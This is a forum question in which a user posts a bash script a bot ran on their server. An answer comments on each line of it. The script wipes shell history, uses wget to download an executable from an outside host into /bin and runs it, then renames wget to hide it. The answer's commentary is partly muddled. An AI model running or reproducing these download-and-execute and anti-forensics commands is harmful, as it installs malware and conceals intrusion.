hax12 hax12 - 6 months ago 53
Bash Question

can someone explain for me what the bot was trying to do please?

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0
cd /bin/
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc /bin/acxxxhruvc
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
ls -la /etc/daemon.cfg
exit 0

aec aec
Answer

My comments are inline below

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0

cd /bin/

#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc

#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod + x acxxxhruvc
/bin/acxxxhruvc

sleep 2

#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good

list the details of this daemon.cfg file
ls -la /etc/daemon.cfg

exit 0

Basically the good application is overwritten with wget which I guess acts the same.

Overall it doesn't do anything you probably want. Could be a malware.